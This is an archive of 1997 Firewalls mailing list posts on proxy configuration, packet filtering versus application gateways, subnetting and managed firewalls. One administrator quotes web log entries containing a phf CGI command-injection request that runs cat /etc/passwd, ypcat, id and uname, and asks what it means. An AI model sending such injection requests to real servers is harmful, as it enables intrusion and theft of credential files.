-0400 (EDT) Received: (mhorn@localhost) by funws302.capmark.funb.com (8.6.12/8.6.12) id KAA08518; Wed, 4 Jun 1997 10:41:12 -0400 Message-ID: <19970604104101.02710@capmark.funb.com> Date: Wed, 4 Jun 1997 10:41:01 -0400 From: "Mark Horn [ Net Ops ]" To: mjr@clark.net Cc: Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <199706030631.XAA11683@honor.greatcircle.com> <199706031349.JAA17464@mail.clark.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.75 In-Reply-To: <199706031349.JAA17464@mail.clark.net>; from Marcus J. Ranum on Tue, Jun 03, 1997 at 09:47:53AM +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum says: >The one to many support requires kernel modifications >in order to work. Basically, you need code that absorbs >all packets going through the firewall, and the pulls the >"real" destination out of the routing layer and connects >to it. So, unless you want to spend a month or so on >writing some pretty subtle kernel hacks, you can't do it >with just FWTK. That's not entirely true. I've made some modifications to plug-gw that exploit a feature of some operating systems. That feature is that you can assign many IP addresses to a single ethernet interface. I don't know how many OS's support this, but I know SunOS doesn't and Solaris does. So, let's say that you have the following client A server C firewall client B server D You want both clients to be able to plug to either server. To accomplish this, assign two addresses to the firewall on the client side and two addresses to the firewall on the server side so that you have: client A W Y server C firewall client B X Z server D Where A, B, C, D, W, X, Y, and Z are all ip addresses. On the client side W represents C and X represents D. On the server side, Y represents A, and Z represents B. So, if client A wants to talk to server D, it connects to ip address W on the firewall. The plug-gw has to have two modifications to allow this to work. First, it needs to recognize which ip address it was called as (e.g. W or X). Second, it needs to be able to specify a source IP address from which the plugged connection will originate. These are both extremely easy modifications, and I'm not a programmer. So, if you'd like this functionality, I'm sure that you can manage to modify it for yourself (*). Using my modified plug-gw, the config for the above example would be (assume that the TCP port the servers are listening on is P): plug-gw: ip W port P A -plug-to C -srcip Y plug-gw: ip X port P A -plug-to D -srcip Y plug-gw: ip W port P B -plug-to C -srcip X plug-gw: ip X port P B -plug-to D -srcip X Thus if client A wanted to talk to server C on port P, it would connect to IP address W port P. If it wanted server D port P, it would connect to IP adddress X port P. Etc. The more generalized syntax is: plug-gw: ip port \ -plug-to [ -port ] [ -srcip ] [ -privport ] Where clientIP is the IP address on the firewall that is being connected to by the client (e.g. w, x, y, or z) listenPort is the port on the firewall that is being connected to by the client allowedhosts is the ip address of the client that is allowed to connect destIP is the destination ip to plug this connection to destport is the destination port to plug this connection to fwallIP is an address on the firewall which the destination will see the connection as coming from. (e.g. w, x, y, or z) If fwallIP is not a valid address on the firewall, the connection will fail. This works. I have it in use on a couple of different production firewalls. It's certainly not a great solution, but it works without having to make kernel modifications. The problem with this, though is that it doesn't scale well. There are two reasons: a) You have to have a unique IP address on the client side of the firewall for every server on the server side. This won't work well if your firewall connects to the Internet where there are a *LOT* of servers. b) The number of configuration lines to set this up is a multiple of the number of clients, servers, directions and ports. So if you have 50 clients, 2 servers, 1 port, and connections need to be initiated in both directions, you'll need 50 * 2 * 2 * 1 = 200 config lines. Even if it doesn't scale well, it's works and it's not hard to do. (*) I have read the TIS license agreement and I am *NOT* going to distribute a patch. The license agreement grants me the license to modify the TIS source code for my own origanization's use. I'm not a lawyer. I don't know if that means I can't legally distribute patches, but it sure sounds like it. Cheers, -- Mark Horn PGP Public Key available from: http://www.es.net/hypertext/pgp.html PGP KeyID/fingerprt: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1 From owner-firewalls-outgoing Wed Jun 4 08:01:38 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA15229 for firewalls-outgoing; Wed, 4 Jun 1997 06:42:25 -0700 (PDT) Received: from relay.logicnet.ro (relay.logicnet.ro [193.226.80.252]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA15212 for ; Wed, 4 Jun 1997 06:42:12 -0700 (PDT) Received: from janus.logictl.net (Emperor@janus.logictl.net [193.226.81.10]) by relay.logicnet.ro (8.8.5/8.8.5) with ESMTP id QAA28441 for ; Wed, 4 Jun 1997 16:45:47 +0300 Received: from janus.logictl.net (janus.logictl.net [193.226.81.10]) by janus.logictl.net (8.8.5/8.8.5) with ESMTP id QAA00205 for ; Wed, 4 Jun 1997 16:45:43 +0300 Message-ID: <33957186.D8E5317F@logicnet.ro> Date: Wed, 04 Jun 1997 16:45:42 +0300 From: Corneliu Tanasa Organization: LOGIC TELECOM SA X-Mailer: Mozilla 4.0b5C (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Strange logs X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Today I found a line like this into my Cisco logs: %SEC-6-IPACCESSLOGP: list 183 denied udp xxx.xxx.xxx.xxx(0) -> yyy.yyy.yyy.yyy(162), 1 packet Have anyone any idea about what this means? I was very surprized about the source port that is zero. Should I be worried that someone tries an attack ? Thanks, Corneliu Tanasa From owner-firewalls-outgoing Wed Jun 4 08:15:38 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA06000 for firewalls-outgoing; Wed, 4 Jun 1997 04:55:26 -0700 (PDT) Received: from mailhuba.bis.bls.com (firewall2.bls.com [192.203.159.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA05945 for ; Wed, 4 Jun 1997 04:54:51 -0700 (PDT) Received: from x400gw.bls.com by mailhuba.bis.bls.com (X.400 to RFC822 Gateway); Wed, 4 Jun 1997 07:58:20 -0500 X400-Received: by mta blsMTA in /c=us/admd=bellsouth/; Relayed; 04 Jun 1997 07:58:19 -0500 X400-Received: by /c=us/admd=bellsouth/; Relayed; 04 Jun 1997 07:58:19 -0500 X400-MTS-Identifier: [/c=us/admd=bellsouth/; 039FA3395666B4AD-blsMTA] Content-Identifier: 039FA3395666B4AD Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: IA5-Text Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: Frataccia.Rick@bis.bls.com X400-Recipients: non-disclosure; Message-Id: <039FA3395666B4AD*/c=us/admd=BellSouth/prmd=bis/o=ccmail/s=Frataccia/g=Rick/@MHS> Date: 04 Jun 1997 07:58:19 -0500 From: RICK FRATACCIA To: firewalls@GreatCircle.COM (IPM Return requested), msquared@hypercon.com (IPM Return requested) Subject: Re: RAPTOR WEBNOT SITE BLOCKING MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mike, In reference to your comment, Do you know if cybernot will work with raptor 4.0 on Solaris? Raptor personnel say that only WebNOT works with Raptor. Rick ______________________________ Reply Separator _________________________________ Subject: RAPTOR WEBNOT SITE BLOCKING Author: msquared@hypercon.com at SMTPMAIL Date: 6/3/97 7:07 PM It was written: " >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted." >CyberPatrol gives two forms at their site for 1) adding a site to the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm. I've seen them take action in as little as two hours. They have always responded the next business day with a confirming mail note. Mike From owner-firewalls-outgoing Wed Jun 4 08:32:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA13726 for firewalls-outgoing; Wed, 4 Jun 1997 06:34:11 -0700 (PDT) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA13582 for ; Wed, 4 Jun 1997 06:33:31 -0700 (PDT) Received: by brimstone.rnb.com; id JAA12657; Wed, 4 Jun 1997 09:37:03 -0400 Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma012431; Wed, 4 Jun 97 09:36:36 -0400 Received: from monarch.rnb.com (monarch [150.1.29.115]) by relay.rnb.com (8.8.5/8.8.5) with SMTP id JAA26001; Wed, 4 Jun 1997 09:36:35 -0400 (EDT) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified. Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Message-ID: X-Mailer: XFMail 1.2-alpha [p0] on Solaris Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Wed, 04 Jun 1997 09:32:25 -0400 (EDT) Organization: Republic National Bank From: Ken Kempster To: "Amy (Cremer) Briggs" Subject: RE: Solaris Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 03-Jun-97 "Amy (Cremer) Briggs" wrote: >First of all if there is a better list to post this to please let me know. >I've checked out Suns web site and didn't find any mention of a Solaris >listserv. > >Does anyone know how can you trick a Solaris box into >treating a class C address as a class B. For example we want to use >2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for It is possible to turn a class C into a class B but you do it by using non-standard subnet masking; you can't use the standard class B subnet mask. There is a way to calculate the subnet mask based on the range of IP's you will be using within the class C address when you break it up. A book detailing the functionality of the IP stack should have in detail how to do this. >this network in the /etc/netmasks file which is how I thought you could do it >but it isn't working for me. It still thinks its a class C address and won't >route properly if I set up my routes using it as a class B address. >Finding a way to make this work would save me hours of time because I >have 5 full class B(Technically class C) networks to do this for and >entering all the class C's within all 5 class B's would take me awhile as >well as complicate my routing table. > >Thanks for any help or information you can give me. > >Amy > > \\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist/////////////// > Library of Michigan amyc@libofmich.lib.mi.us >\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////////////// > ** Its not what you've got, its what you give--TESLA ** > > > > > > > > > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _\|/_ | | Republic National Bank (o o) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Wed Jun 4 09:00:52 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA29865 for firewalls-outgoing; Wed, 4 Jun 1997 08:43:54 -0700 (PDT) Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA29834 for ; Wed, 4 Jun 1997 08:43:44 -0700 (PDT) Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id LAA05990; Wed, 4 Jun 1997 11:47:33 -0400 (EDT) Message-Id: <3.0.32.19970604114909.00952700@the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 04 Jun 1997 11:49:24 -0400 To: "Mark Horn [ Net Ops ]" From: Anton J Aylward Subject: Re: Plug-gw- One to many relationship Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:41 AM 04/06/97 -0400, Mark Horn [ Net Ops ] wrote: > >You want both clients to be able to plug to either server. To accomplish >this, assign two addresses to the firewall on the client side and two >addresses to the firewall on the server side so that you have: > > client A W Y server C > firewall > client B X Z server D No, no, no, what *I* want and what about 10^7 other sites want is this... client A W server C firewall server D client B server F server G server H server I server K Now that's what *I* call a one to many mapping. You come up with a good way to do this and you'll be famous. One public address, and a 10.x.x.x of internal addresses and web servers. POW! The address space problem just went away. Well, we can dream can't we ? (maybe I should have littered this with smileys so I don't get flamed. Oh well) -------------------------------------------------------------------------- Anton J Aylward | So, Two cheers for Democracy: one The Strahn & Strachan Group Inc | because it admits variety and two Information Security Consultants | because it permits criticism. Voice: (416) 494-8661 | - E. M. Forster Fax: (416) 494-8803 | From owner-firewalls-outgoing Wed Jun 4 09:02:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA16235 for firewalls-outgoing; Wed, 4 Jun 1997 06:49:24 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA16227 for ; Wed, 4 Jun 1997 06:49:14 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp5.cisco.com [171.68.146.26]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id PAA10173; Wed, 4 Jun 1997 15:50:23 +0200 (METDST) Message-Id: <3.0.32.19970604141245.006e8264@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 04 Jun 1997 15:53:05 +0000 To: Pedro Salgueiro , "'Mike Jones'" From: Eric Vyncke Subject: RE: PIX and Firewall-1 Cc: "'firewalls'" Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Pedro, Even if I am working for Cisco, may I add the following inline comments ? You should not confuse between: - packet filtering routers i.e. plain Cisco or xxx routers with cumbersome and intrecate access control lists - a firewall component which use a more evolved inspection technique like PIX or Firewall-1 At 09:29 4/06/97 +0100, Pedro Salgueiro wrote: >Hi to all, > >I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some: >1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure =3D> less secure). >It may be very complicated establishing rules. True for routers, not true for components like PIX or Firewall-1. The later are more protocol aware and thus ACL are much easier to configure >2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known contructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one. True again for routers, but, false for PIX/FW-1 >3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols,i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols. True again for routers, but, false for PIX/FW-1. The later have the knowledge of HTTP, SMTP, ... protocols and actually analyse the traffic to make their decision. Hope this helps >Regards, > >Pedro Salgueiro > > =20 >Data General Portugal >Tel. +351 - 1 - 4129600 >Fax. +351 - 1 - 4129699 >mailto:psalgueiro@pt.europe.dg.com > >R. Dr. Ant=F3nio Loureiro Borges n=BA2 >Arquiparque - Miraflores >1495 Alg=E9s >Portugal >______________________________________________ >"Don't take life too serious no one gets out alive!!!! :-)" > >* These are my own opinions and do not reflect those of the company * > >---------- >From: Mike Jones >Sent: quarta-feira, 4 de junho de 1997 8:55 >To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com >Subject: Re: PIX and Firewall-1 > >Peter Carlson writes.... >> There are many comparisons made by datacomm, lan times, ziff-davis and >> others. Keep in mind that both pix and fw-1 are glorified packet= filters, >> even though they have a fancy name for it. I wouyld stick with an >> application level gateway. They are well accepted and known for being= more >> secure. > >Many things are known that aren't so. This claim comes by periodically >in this forum, and I have yet to get an answer to this question: in=20 >whatway are application level gateways more secure than, say, FW-1 or PIX? >There are certainly capabilities that can be provided via application=20 >proxies that can't be provided by any filter-based technologies, but what >types of attacks are a FW-1 or a PIX vulnerable to that application >proxies aren't? >-- > Mike Jones > Sr. Technology Advisor > UNIFIED Technologies > > From owner-firewalls-outgoing Wed Jun 4 09:15:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA02125 for firewalls-outgoing; Wed, 4 Jun 1997 08:56:36 -0700 (PDT) Received: from freenet.grfn.org (grfn.org [206.30.236.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA02085 for ; Wed, 4 Jun 1997 08:56:23 -0700 (PDT) Received: from unknown (dlup59.i2k.com [199.176.248.59]) by freenet.grfn.org (8.8.5/8.8.5) with SMTP id LAA11368 for ; Wed, 4 Jun 1997 11:54:30 -0400 (EDT) Message-ID: In-Reply-To: <3395210C.7EAF@pdx.com.my> References: Conversation <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> with last message <3395210C.7EAF@pdx.com.my> X-MSMail-Priority: Normal X-Priority: 3 To: "Firewalls Mailing List" MIME-Version: 1.0 From: "Mariko Yashada" Subject: Re: ISP Connection Date: Wed, 04 Jun 97 12:01:18 PDT Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thank you for all your comments. Last fall our plan was to connect to the Internet through MCI. We security people said fine, but you will need a firewall for any connections between the Internet and the Enterprise Network. So we did an evaluation of firewalls and settled on two we felt best suited our needs. The firewall added enough cost to the project that it was postponed. It has now been revived using our ISP for the connection with the hope the ISP can some way offer the security. I see now we should to follow our original plan and put up a firewall at our end. Here is a related question: There is another local ISP who will connect us at T1 and install a firewall at our location. They will then administer the firewall remotely from their location. They support three different firewalls, Gauntlet, Firewall-1 and Borderware. The advantage is the savings in admin costs. Has anyone had any experience with this type of arrangement? We have also talked to BBN about their Site Patrol product, which is a remotely managed Gauntlet. Thanks, Mariko From owner-firewalls-outgoing Wed Jun 4 10:00:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01980 for firewalls-outgoing; Wed, 4 Jun 1997 08:55:45 -0700 (PDT) Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA01898 for ; Wed, 4 Jun 1997 08:55:24 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id TAA00888; Wed, 4 Jun 1997 19:01:13 +0400 From: ArkanoiD Message-Id: <199706041501.TAA00888@paranoid.convey.ru> Subject: Re: Plug-gw- One to many relationship To: mhorn@funb.com (Mark Horn [ Net Ops ]) Date: Wed, 4 Jun 1997 19:01:12 +0400 (MSD) Cc: mjr@clark.net, Firewalls@GreatCircle.COM In-Reply-To: <19970604104101.02710@capmark.funb.com> from "Mark Horn [ Net Ops ]" at Jun 4, 97 10:41:01 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > This works. I have it in use on a couple of different production > firewalls. It's certainly not a great solution, but it works without > having to make kernel modifications. The problem with this, though is > that it doesn't scale well. There are two reasons: > > a) You have to have a unique IP address on the client side of the > firewall for every server on the server side. This won't > work well if your firewall connects to the Internet where > there are a *LOT* of servers. > > b) The number of configuration lines to set this up is a multiple > of the number of clients, servers, directions and ports. > So if you have 50 clients, 2 servers, 1 port, and > connections need to be initiated in both directions, > you'll need 50 * 2 * 2 * 1 = 200 config lines. > > Even if it doesn't scale well, it's works and it's not hard to do. > > (*) I have read the TIS license agreement and I am *NOT* going to > distribute a patch. The license agreement grants me the license > to modify the TIS source code for my own origanization's use. I'm > not a lawyer. I don't know if that means I can't legally > distribute patches, but it sure sounds like it. > Hmm,hey TIS people,is it true? If yes - can you allow him to distribute the patch? -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Wed Jun 4 10:01:38 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03048 for firewalls-outgoing; Wed, 4 Jun 1997 09:02:01 -0700 (PDT) Received: from guru.unixpros.com (guru.unixpros.com [207.17.234.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA03033 for ; Wed, 4 Jun 1997 09:01:54 -0700 (PDT) Message-Id: <199706041601.JAA03033@honor.greatcircle.com> Received: by guru.unixpros.com (1.38.193.4/16.2) id AA24983; Wed, 4 Jun 1997 12:04:34 -0400 From: Stan Wnuck Subject: getting passwd file via WWW To: Firewalls@GreatCircle.COM Date: Wed, 4 Jun 97 12:04:34 EDT Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I have noticed on my WWW log files the following 2 entries. some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 Does anyone know anything about these cgi scripts or programs? Or how dangerous this is? I changed the real source location to a fake some.remote.location.edu to not let out the bag of the source of this hack, since I am not sure what my next move would be. Thanks in advance. Stan Wnuck swnuck@unixpros.com Unixpros, Inc. 10 Industrial Way East (908) 389-3295 x542 Eatontown, NJ 07724 (908) 389-5461 Fax PM-CHS Technology Insertion Office Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963 From owner-firewalls-outgoing Wed Jun 4 10:39:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09635 for firewalls-outgoing; Wed, 4 Jun 1997 09:40:35 -0700 (PDT) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09603 for ; Wed, 4 Jun 1997 09:40:16 -0700 (PDT) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id LAA24931; Wed, 4 Jun 1997 11:28:29 -0400 Date: Wed, 4 Jun 1997 11:28:25 -0400 (EDT) From: Rabid Wombat To: Jyri Kaljundi cc: Firewalls@GreatCircle.COM Subject: Re: Security Crazy In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 1 Jun 1997, Jyri Kaljundi wrote: > > Sat, 31 May 1997, Marcus J. Ranum wrote: > > >> my CEO has gone security crazy [...] win95 > > > > He's a bit unclear on the concept, isn't he? > > I am pretty sure there actually are good commercial systems available to > make large number of win95 machines much more secure than as they are > out-of-box. All things are relative ... From owner-firewalls-outgoing Wed Jun 4 11:00:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA23626 for firewalls-outgoing; Wed, 4 Jun 1997 10:58:32 -0700 (PDT) Received: from nexus.net.mx (nexusparc.acnet.net [167.114.25.165]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA21897 for ; Wed, 4 Jun 1997 10:49:07 -0700 (PDT) Received: (from jdelgado@localhost) by nexus.net.mx (8.8.5/8.7.2) id MAA23460; Wed, 4 Jun 1997 12:58:27 -0500 (CDT) Date: Wed, 4 Jun 1997 12:58:27 -0500 (CDT) From: Jose Luis Delgado To: firewalls@GreatCircle.Com Subject: Secure Telnet! In-Reply-To: <33956E4A.6590018C@pvt.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ssh (Secure Shell) is a program to log into another computer over a > network, to execute > commands in a remote machine, and to move files from one machine to > another. It provides strong > authentication and secure communications over insecure channels. > Hi to everyone! Does anybody know, where can I find shareware/freeware SECURE telnet for NT??? Thanks in advance! From owner-firewalls-outgoing Wed Jun 4 11:49:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA04001 for firewalls-outgoing; Wed, 4 Jun 1997 09:09:05 -0700 (PDT) Received: from ACSacs.Com (sprite.acsacs.com [206.16.240.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA03992 for ; Wed, 4 Jun 1997 09:08:58 -0700 (PDT) Date: Wed, 4 Jun 1997 09:13:09 -0700 From: "Daniel J Blander - Sr. Systems Engineer for ACS" X-Sender: phaedrus@ferrari To: Pedro Salgueiro cc: "'Mike Jones'" , "'firewalls'" Subject: RE: PIX and Firewall-1 (Thesis Length) In-Reply-To: <01BC70CA.41A88880@pcpedro> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I disagree and agree (in that order).... On Wed, 4 Jun 1997, Pedro Salgueiro wrote: > I've been "watching" the discussion regarding the differences between > packet-filtering and application level firewalls. I believe that there > are some: > 1 - Packet filtering firewalls are more difficult to manage > (It is very simple to mis-configure => less secure). > It may be very complicated establishing rules. Most firewalls are "difficult" to configure. One is not necessarily more difficult to configure than another. Even application level firewalls ask you to list valid hosts, networks, etc - so misconfiguration can be just as difficult. The focus should be on the tools used to configure the rules. If they are lacking and poor, like anything else, it will be hard to configure. > 2 - Packet filter systems are always routing packets > (so "fail-open" may occur). A well known contructor firewall crashed > with a ping attack and routed all the packets from the insecure > network to the secure one. Unfortunately the conclusion that you draw from this example is not quite accurate. Yes, packet filtering systems and stateful-inspection firewalls do route packets (and *yes* virginia, they are two different types of firewalls) but that does not necessarily mean that "fail-open" occurs. I can list at least one vendor where the failure of the firewall causes packets *not* to be routed (good old systems that allow ip-forwarding to be turned off and then the firewall, while up, forwards the packets itself - failure of the firewall means forwarding has also failed since the underlying system will so - sorry, I won't do it). > 3 - If you are using a packet filter system and you provide SMTP, > HTTP, etc. you cannot control what the users do with those > protocols,i.e., you open or close a port. Application level > firewalls provide secure daemons of those protocols. Here is where I agree 100%. You can not, with a packet filter or pure stateful-inspection firewall, filter what people do over those ports. The best firewalls out there are those that are not really out there yet. They are hybrids of stateful-inspection and application level firewalls. Stateful inspection allows me to filter and manage even UDP connections (good old NTP for example which I have customers who *must* have it) but I need applicaiton level firewalls to control the garbage being stuffed over http these days, or to protect the smtp port....I like stateful-inspection firewalls because they watch the high-ports for me and close them when a FIN is sent for a specific communications and log any probes on these ports. There are benefits to both technologies: stateful-inspection and application gateways. I will admit pure, old style ACL packet filtering is insecure and limited in its usefulness if used alone but only because certain protocols have unusual requirements (FTP in Active mode) and that someone figured out how to send RST packets to still open high ports and other fun and games with the IP protocols. The advance of the exploits to a given technology require new tools to counter them. Old style ACL packet filtering was good when it first hit because it was all we thought we needed. Then someone figured out how to spoof packets and work around on high ports. Now we have countered that with application level firewalls which control even the content but are limited in what types of protocols can go through (which is a good thing and a bad thing). Stateful Inspection firewalls came along and said, lets have it somewhere in the middle (ok, closer to packet filtering firewalls but with communications state built in). There will be exploits found in both of these technologies as well - between mis-configuration, TCP sequence attacks, man-in-the-middle attacks, etc, there are enough hacks out there that say the real issues are begining to reach beyond whether you are using packet filtering, stateful inspection or application level firewalls, and beg for a new style of firewall - a new technology.... (And, No I don't think that it is Abir-Net.....;-) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Daniel Blander =8^) Sr. Systems Engineer Applied Computer Solutions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Phone: (714) 842.7800 Fax: (714) 842.8299 Email: Daniel.Blander@acsacs.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.acsacs.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From owner-firewalls-outgoing Wed Jun 4 11:54:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA12279 for firewalls-outgoing; Wed, 4 Jun 1997 09:57:51 -0700 (PDT) Received: from silence.secnet.com ([199.185.231.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA10092 for ; Wed, 4 Jun 1997 09:42:41 -0700 (PDT) Received: from localhost (oliver@localhost) by silence.secnet.com (8.8.5/secnet) with SMTP id KAA20536 for ; Wed, 4 Jun 1997 10:50:00 -0600 (MDT) Date: Wed, 4 Jun 1997 10:49:59 -0600 (MDT) From: Oliver Friedrichs To: firewalls@greatcircle.com Subject: [SNI-14]: Solaris rpcbind vulnerability Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have just released a security advisory which effects individuals filtering rpcbind under Solaris 2.x platforms. The advisory is availible at http://www.secnet.com/advisories/sni-14.solaris.rpcbind.advisory.html - Oliver - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Secure Networks Incorporated. Calgary, Alberta, Canada, (403) 262-9211 From owner-firewalls-outgoing Wed Jun 4 12:10:55 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA12571 for firewalls-outgoing; Wed, 4 Jun 1997 09:59:39 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA12482 for ; Wed, 4 Jun 1997 09:59:16 -0700 (PDT) Received: from future.mulligan.com by grab 